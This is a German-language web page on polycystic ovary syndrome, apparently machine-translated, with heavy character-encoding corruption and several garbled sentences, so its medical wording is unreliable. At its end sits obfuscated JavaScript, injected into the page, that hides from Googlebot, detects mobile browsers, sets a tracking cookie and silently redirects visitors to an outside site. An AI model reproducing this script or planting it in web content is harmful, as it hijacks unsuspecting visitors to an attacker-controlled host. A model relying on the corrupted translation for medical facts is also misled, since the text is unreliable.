Krankheit

Polyzystische Ovar-Syndrom

Polyzystische Ovar-SyndromPolyzystische Ovar-Syndrom (PCOS) ist eine hA�ufige hormonelle StA�rung von Frauen im gebA�rfA�higen Alter.A�Der Name stammt von dem Zustand des Auftretens der EierstA�cke in den meisten, aber nicht alle Frauen mit der Erkrankung – vergrA�AYert und mit zahlreichen kleinen Zysten entlang der AuAYenkante jeder Eierstock-(polyzystisches Aussehen) befindet.

Seltene oder verlA�ngerte Regelblutungen, Haarwuchs, Akne und A?bergewicht alle kA�nnen auftreten bei Frauen mit PCO-Syndrom.A�Bei Jugendlichen kann selten oder nicht vorhanden Menstruation den Zustand zu signalisieren.A�Frauen nach der PubertA�t, kA�nnen Schwierigkeiten, schwanger zu werden oder unerklA�rliche Gewichtszunahme das erste Zeichen sein.

Die genaue Ursache des PCO-Syndrom ist unbekannt.A�Eine frA?hzeitige Diagnose und Behandlung kann das Risiko von Langzeitkomplikationen, wie Typ-2-Diabetes und Herzerkrankungen.

Symptome

PCO-Syndrom Anzeichen und Symptome beginnen oft schon bald nach einer Frau beginnt erst mit Perioden (Menarche).A�In einigen FA�llen entwickelt PCOS spA�ter wA�hrend der reproduktiven Jahre, beispielsweise in Reaktion auf erhebliche Gewichtszunahme.

Anzeichen und Symptome variieren von Person zu Person, sowohl in der Art und Schwere.A�Um mit der Krankheit diagnostiziert werden kann, sieht Ihr Arzt fA?r mindestens zwei der folgenden:

  • Menstruations AbnormitA�t.A�A�Dies ist die hA�ufigste Merkmal.A�Beispiele von Menstruationsanomalie sind Menstruationsintervalle lA�nger als 35 Tage;A�weniger als acht Menstruationszyklen pro Jahr;A�Ausfall fA?r vier Monate oder lA�nger menstruieren;A�und lA�ngere Perioden, die kaum oder schwer sein kann.
  • A?berschA?ssiges Androgen.A�A�ErhA�hte Werte der mA�nnlichen Hormone (Androgene) in kA�rperliche Anzeichen, wie A?ber Gesichts-und KA�rperbehaarung (Hirsutismus), Erwachsenen-Akne oder schweren jugendlichen Akne und mA�nnlich-Haarausfall (androgenetische Alopezie) fA?hren.A�Doch die kA�rperliche Anzeichen von AndrogenA?berschuss variieren mit der ethnischen ZugehA�rigkeit, so je nach ethnischer Herkunft kA�nnen Sie oder kA�nnen nicht Anzeichen von A?ber Androgen zu zeigen.A�Zum Beispiel kA�nnen Frauen von Nord-europA�ische oder asiatische Abstammung nicht berA?hrt.
  • Polyzystische Ovarien.A�A�vergrA�AYerte Ovarien mit zahlreichen kleinen Zysten kA�nnen durch Ultraschall erkannt werden.A�Trotz den Namen der Zustand der, ich polyzystischen Ovarien allein nicht die Diagnose bestA�tigen.A�Um mit PCOS diagnostiziert werden, mA?ssen Sie auch haben abnorme Menstruationszyklus oder Anzeichen von Androgen-A?berschuss.A�Einige Frauen mit polyzystischen Ovarien haben nicht PCOS, wA�hrend ein paar Frauen mit der Erkrankung haben, die EierstA�cke normal.

Wenn zu einem Arzt
sprechen Sie mit Ihrem Arzt, wenn Sie UnregelmA�AYigkeiten bei der Menstruation haben – wie seltenen Perioden, lA�ngere Zeit oder gar keine Menstruation – vor allem, wenn Sie A?ber die Haare im Gesicht und KA�rper oder Akne haben.

Eine frA?hzeitige Diagnose und Behandlung von PCO-Syndrom kann helfen, das Risiko von Langzeitkomplikationen, wie Typ-2-Diabetes, Bluthochdruck und Herzerkrankungen.

Ursachen

A�rzte wissen nicht die Ursache des PCO-Syndrom, aber diese Faktoren wahrscheinlich eine Rolle spielen:

  • . A?berschA?ssige InsulinA�A�Insulin ist das in der BauchspeicheldrA?se, die Zellen, um Zucker (Glukose) verwenden kA�nnen Hormon – Ihrem KA�rper die PrimA�renergieversorgung.Wenn Sie eine Insulinresistenz haben, wird Ihre FA�higkeit, Insulin effektiv zu nutzen beeintrA�chtigt und die BauchspeicheldrA?se muss mehr Insulin absondern Glukose zur VerfA?gung, um Zellen zu machen.A�Das A?berschA?ssige Insulin kA�nnte Androgen-Produktion zu steigern, indem Sie Ihre EierstA�cke.
  • Low-grade EntzA?ndung.A�A�weiAYen BlutkA�rperchen Ihr KA�rper die Substanzen produzieren, um eine Infektion in einer Antwort genannt EntzA?ndungen zu bekA�mpfen.Essen bestimmter Lebensmittel kA�nnen eine entzA?ndliche Reaktion in einigen prA�disponiert Menschen auslA�sen.A�Wenn dies geschieht, weiAYe Blutzellen produzieren Substanzen, die zur Insulinresistenz und Cholesterin-Akkumulation in BlutgefA�AYe (Arteriosklerose) fA?hren kann.A�Arteriosklerose verursacht Kreislauferkrankungen.A�Die Forschung hat gezeigt, dass Frauen mit PCOS haben Low-grade-EntzA?ndung.
  • Vererbung.A�A�Wenn deine Mutter oder Schwester hat PCOS, kA�nnte man eine grA�AYere Chance, mit ihm haben, auch.A�Forscher auch in der MA�glichkeit, die Gene sind an PCOS verbunden mutiert suchen.
  • . Abnorme fetale EntwicklungA�A�Einige Untersuchungen zeigen, dass eine A?bermA�AYige Belastung durch mA�nnliche Hormone (Androgene) im fA�talen Leben dauerhaft normale Gene zu verhindern, arbeiten, wie sie zu vermuten – ein Verfahren, wie die Genexpression bekannt.A�Dies kann eine mA�nnliche Muster von Bauchfettverteilung, die das Risiko einer Insulinresistenz und Low-grade-EntzA?ndung erhA�ht fA�rdern.A�Forscher weiterhin, inwieweit diese Faktoren zur PCOS beitragen zu untersuchen.

Komplikationen

Mit PCO-Syndrom macht die folgenden Bedingungen eher, vor allem wenn A?bergewicht ist auch ein Faktor:

  • Typ-2-Diabetes
  • Bluthochdruck
  • Cholesterin-und Lipidanomalien, wie erhA�hte Triglyceride oder niedrige High-Density-Lipoprotein (HDL)-Cholesterin, das “gute” Cholesterin
  • ErhA�hte Spiegel an C-reaktivem Protein, einem kardiovaskulA�ren Erkrankungsmarker
  • Metabolisches Syndrom, eine AnhA�ufung von Anzeichen und Symptomen, die ein signifikant erhA�htes Risiko fA?r kardiovaskulA�re Erkrankungen zeigen
  • Nichtalkoholische Steatohepatitis, eine schwere LeberentzA?ndung durch Fettansammlung in der Leber verursacht
  • Schlaf-Apnoe
  • Abnorme uterine Blutungen
  • Krebs der GebA�rmutterschleimhaut (Endometriumkarzinom), durch Einwirkung von kontinuierlich hohe A�strogenspiegel verursacht
  • Schwangerschafts-Diabetes oder Schwangerschaft-induzierten Bluthochdruck, wenn Sie schwanger werden

Vorbereitung fA?r den Termin

Du bist wahrscheinlich von dem ersten Sehen Sie Ihren Hausarzt oder Grundversorgung Anbieter starten.A�Doch in einigen FA�llen, wenn Sie anrufen, um einen Termin kA�nnen Sie sofort zu einem Arzt, der in Erkrankungen des weiblichen Genitaltrakt (Frauenarzt), einer, der in HormonstA�rungen (Endokrinologen) spezialisiert oder einer, der in beiden Bereichen spezialisiert spezialisiert bezeichnet werden (reproduktive Endokrinologe).

Was Sie tun kA�nnen
, um fA?r den Termin vor:

  • Schreiben Sie alle Symptome bei Ihnen auftreten.A�FA?gen Sie alle Ihre Symptome, auch wenn Sie nicht denken, sie sind verwandt.
  • Machen Sie eine Liste der Medikamente, Vitamine und andere NahrungsergA�nzungsmittel mitnehmen.A�Schreiben Sie Dosen und wie oft Sie sie zu nehmen.
  • Haben Sie ein Familienmitglied oder enger Freund begleiten Sie, wenn mA�glich.A�Sie kA�nnen eine Menge von Informationen auf Ihren Besuch gegeben werden, und es kann schwierig sein, alles zu erinnern.
  • Nehmen Sie ein Notebook oder einen Notizblock mit Ihnen.A�Verwenden Sie es, um wichtige Informationen wA�hrend Ihres Besuchs zu notieren.
  • A?berlegen Sie, was Fragen, die Sie stellen.A�Schreiben Sie sie auf;A�Liste der wichtigsten Fragen zuerst, im Falle die Zeit ablA�uft.

FA?r PCO-Syndrom, sind einige grundlegende Fragen zu stellen:

  • Welche Arten von Tests kA�nnte ich?
  • Wie funktioniert diese Bedingung auf meine FA�higkeit, schwanger zu werden?
  • Sind Medikamente zur VerfA?gung, die meine Symptome oder meine FA�higkeit zu begreifen verbessern kA�nnten?
  • Ich habe andere medizinischen Bedingungen.A�Wie kann ich am besten verwalten sie zusammen?
  • Welche Nebenwirkungen kann ich von Medikamenten zu erwarten?
  • Unter welchen UmstA�nden haben Sie eine Operation empfehlen?
  • Welche Behandlung Sie fA?r meine Situation empfehlen?
  • Was sind die langfristigen gesundheitlichen Auswirkungen von PCOS?
  • Haben Sie BroschA?ren oder anderen gedruckten Materialien, die ich mit mir nehmen?
  • Welche Websites mA�chten Sie empfehlen den Besuch?

Stellen Sie sicher, dass Sie alles, was Ihr Arzt Ihnen sagt, zu verstehen.A�ZA�gern Sie nicht, Ihren Arzt bitten, Informationen zu wiederholen oder Folgefragen zur KlA�rung bitten.

Was Sie von Ihrem Arzt erwarten
Einige mA�gliche Fragen Sie Ihren Arzt oder andere Leistungserbringer kA�nnten fragen sind:

  • Welche Anzeichen und Symptome werden Sie erleben?
  • Wie oft haben Sie diese Symptome?
  • Wie lange haben Sie schon erlebt Symptome?
  • Wie stark sind Ihre Symptome?
  • Wann haben Sie zuletzt eine Frist?
  • Haben Sie an Gewicht gewonnen, seit Sie das erste Mal mit Perioden?A�Wie viel Gewicht haben Sie gewonnen?A�Wann haben Sie das zu?
  • Gibt es etwas zu verbessern, Ihre Symptome?
  • Gibt es etwas zu machen, Ihre Symptome schlimmer werden?
  • Sind Sie versuchen, schwanger zu werden, oder sind Sie schwanger werden wollen?
  • Hat Ihre Mutter oder Schwester immer mit PCOS diagnostiziert?

Untersuchungen und Diagnostik

Es gibt keinen spezifischen Test zur endgA?ltigen Diagnose PCO-Syndrom.A�Die Diagnose ist eine der Ausgrenzung, was bedeutet, Ihr Arzt hA�lt alle Ihre Zeichen und Symptome und schlieAYt andere mA�gliche StA�rungen dann.

WA�hrend dieses Prozesses nimmt Ihr Arzt viele Faktoren zu berA?cksichtigen:

  • Medizin-Geschichte.A�A�Ihr Arzt kann Fragen stellen A?ber Ihre Menstruation, GewichtsverA�nderungen und andere Symptome.
  • KA�rperliche Untersuchung.A�A�WA�hrend kA�rperliche Untersuchung, wird Ihr Arzt einige wichtige Informationen, einschlieAYlich Ihre HA�he, Gewicht und Blutdruck beachten.
  • GynA�kologische Untersuchung.A�A�WA�hrend einer Becken-PrA?fung, wird Ihr Arzt visuell und manuell A?berprA?ft Ihren Fortpflanzungsorgane auf Anzeichen von Massen, Wucherungen oder andere AuffA�lligkeiten.
  • Blutuntersuchungen.A�A�Ihr Blut kann gezeichnet, um die Pegel mehrerer Hormone zu messen, um mA�gliche Ursachen von MenstruationsstA�rungen oder AndrogenA?berschuss, die PCOS imitieren auszuschlieAYen.A�Weitere Bluttests kann Fasten Cholesterin und Triglycerid-Spiegel und ein Glukose-Toleranz-Test, bei dem Blutzuckerspiegel gemessen werden, wA�hrend des Fastens und nach dem Trinken einer glukosehaltigen GetrA�nke enthalten.
  • Becken-Ultraschall.A�A�Ein Becken-Ultraschall kA�nnen das Aussehen der EierstA�cke und der Dicke der Auskleidung der GebA�rmutter zu zeigen.A�WA�hrend des Tests auf einem Bett oder Untersuchungstisch liegen Sie wA�hrend ein Zauberstab-A�hnliches GerA�t (Transducer) wird in der Scheide (transvaginale Ultraschall) gelegt.A�Der Wandler sendet unhA�rbare Schallwellen, die in Bilder auf einem Computerbildschirm A?bersetzt werden.

Behandlungen und Medikamente

PCO-Syndrom Behandlung konzentriert sich in der Regel auf das Management Ihrer individuellen Hauptanliegen, wie Unfruchtbarkeit, Hirsutismus, Akne oder Fettleibigkeit.

Medikamente
Ihr Arzt ein Medikament verschreiben:

  • Regulieren Sie Ihren Menstruationszyklus.A�A�Wenn Sie nicht versuchen, schwanger zu werden sind, kann Ihr Arzt niedrig dosierte Antibabypillen, die eine Kombination von synthetischem A�strogen und Progesteron enthalten, empfehlen.A�Sie vermindern Androgen-Produktion und geben Sie Ihrem KA�rper eine Pause von den Auswirkungen der kontinuierlichen A�strogen.A�Dies verringert das Risiko von GebA�rmutterkrebs und korrigiert abnorme Blutungen.Ein alternativer Ansatz ist unter Progesteron fA?r 10 bis 14 Tage pro Monat.A�Diese regelt Ihre Zeit und bietet Schutz gegen GebA�rmutterkrebs, aber es funktioniert nicht Androgenspiegel zu verbessern.

    Ihr Arzt kann auch Metformin (Glucophage, Glucophage XR), ein orales Medikament fA?r Typ-2-Diabetes, der Insulinspiegel senkt verschreiben.A�Dieses Medikament verbessert Eisprung und fA?hrt zu regelmA�AYigen Menstruationszyklus.A�Metformin verlangsamt auch das Fortschreiten zu Diabetes Typ 2, wenn Sie bereits PrA�diabetes und hilft bei der Gewichtsabnahme, wenn Sie auch eine DiA�t und ein Trainingsprogramm zu folgen.

  • Helfen Sie Eisprung.A�A�Wenn Sie versuchen, schwanger zu werden sind, mA?ssen Sie eventuell ein Medikament, damit Sie Eisprung.A�Clomifen (Clomid, Serophene) ist ein orales Anti-A�strogen-Medikamente, die Sie im ersten Teil des Menstruationszyklus zu nehmen.A�Wenn Clomiphencitrat allein ist nicht wirksam, kann Ihr Arzt Metformin hinzufA?gen, um zu induzieren Eisprung.Wenn Sie mit Clomifen und Metformin nicht schwanger werden mA?ssen, kann Ihr Arzt empfehlen, mit Gonadotropinen – Follikel-stimulierendes Hormon (FSH) und Luteinisierendes Hormon (LH) Medikamente, die durch Injektion verabreicht werden.
  • Reduzieren Sie A?bermA�AYigen Haarwuchs.A�A�Ihr Arzt kann die Pille empfehlen, Androgen-Produktion zu verringern, oder ein anderes Medikament namens Spironolacton (Aldactone), die blockiert die Wirkung von Androgenen auf der Haut.A�Da Spironolacton Geburtsfehler verursachen kann, ist eine wirksame EmpfA�ngnisverhA?tung erforderlich, wenn die Droge, und es ist nicht empfehlenswert, wenn Sie schwanger sind oder planen, schwanger zu werden sind.A�Eflornithine (Vaniqa) ist eine weitere MA�glichkeit, Medikamente;A�die Creme verlangsamt Gesichtshaarwachstum bei Frauen.

Chirurgie
Wenn Medikamente nicht helfen, schwanger zu werden, eine ambulante Chirurgie genannt laparoskopische Eierstock-Bohren ist eine Option fA?r einige Frauen mit PCOS.A�Ihr Arzt kann Ihnen helfen, festzustellen, ob Sie ein Kandidat fA?r diese Art der Operation sind.

In diesem Verfahren macht der Chirurg einen kleinen Einschnitt in den Bauch und fA?gt ein Rohr mit einem kleinen Kamera (Laparoskop) befestigt ist.A�Die Kamera liefert dem Chirurgen detaillierte Bilder von den EierstA�cken und den benachbarten Beckenorgane.A�Der Chirurg fA?hrt dann andere chirurgische Instrumente durch kleine Einschnitte und verwendet elektrische oder Laserenergie, um LA�cher in Follikel auf der OberflA�che der EierstA�cke zu verbrennen.A�Das Ziel ist, um die Ovulation zu induzieren.

Lifestyle und Hausmittel

Aufmerksamkeit auf die Lebensmittel, die Sie essen und Ihre AktivitA�t kann Ihnen helfen, die Auswirkungen von PCOS-Offset:

  • Halten Sie Ihr Gewicht in Schach.A�A�Gewicht macht Insulinresistenz schlimmer.Gewichtsverlust kann sowohl Insulin-und Androgen-Spiegel zu senken, und kann der Eisprung wieder herzustellen.A�Keine einzige spezielle ErnA�hrungs Ansatz ist am besten, aber Gewicht zu verlieren, indem der Gesamtkalorienzufuhr kann die allgemeine Gesundheit der Frauen mit PCO-Syndrom profitieren.A�Fragen Sie Ihren Arzt, um eine Gewichtskontrollprogramm empfehlen, und treffen sich regelmA�AYig mit einem ErnA�hrungsberater um Hilfe bei der Erreichung Gewichtsverlust Ziele.
  • Betrachten Sie VerA�nderungen in der ErnA�hrung.A�A�Low-Fett, kA�nnen kohlenhydratreiche ErnA�hrung den Insulinspiegel erhA�hen, so kA�nnen Sie eine Low-Carb-DiA�t beachten, wenn Sie PCOS haben – und wenn Ihr Arzt empfiehlt es.A�SchrA�nken Sie nicht Kohlenhydrate;A�WA�hlen Sie stattdessen komplexe Kohlenhydrate, die reich an Ballaststoffen sind.A�Die mehr Ballaststoffe in einem Lebensmittel ist, desto mehr ist es langsam verdaut, und die langsam den Blutzuckerspiegel ansteigen.A�High-Faser Kohlenhydrate sind Vollkornbrot und MA?sli, Vollkornnudeln, Bulgur, Gerste, brauner Reis und Bohnen.A�Begrenzen Sie weniger gesunde, einfache Kohlenhydrate wie Soda, A?ber Fruchtsaft, Kuchen, SA?AYigkeiten, Eis, Kuchen, Cookies und Donuts.
  • Seien Sie aktiv.A�A�A?bung hilft den Blutzuckerspiegel.A�Wenn Sie PCOS haben, erhA�hen Sie die tA�glichen AktivitA�ten und die Teilnahme an einem regelmA�AYigen Trainingsprogramm kann zu behandeln oder sogar zu verhindern, Insulinresistenz und helfen Ihnen, Ihr Gewicht unter Kontrolle zu halten.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Powered by: Wordpress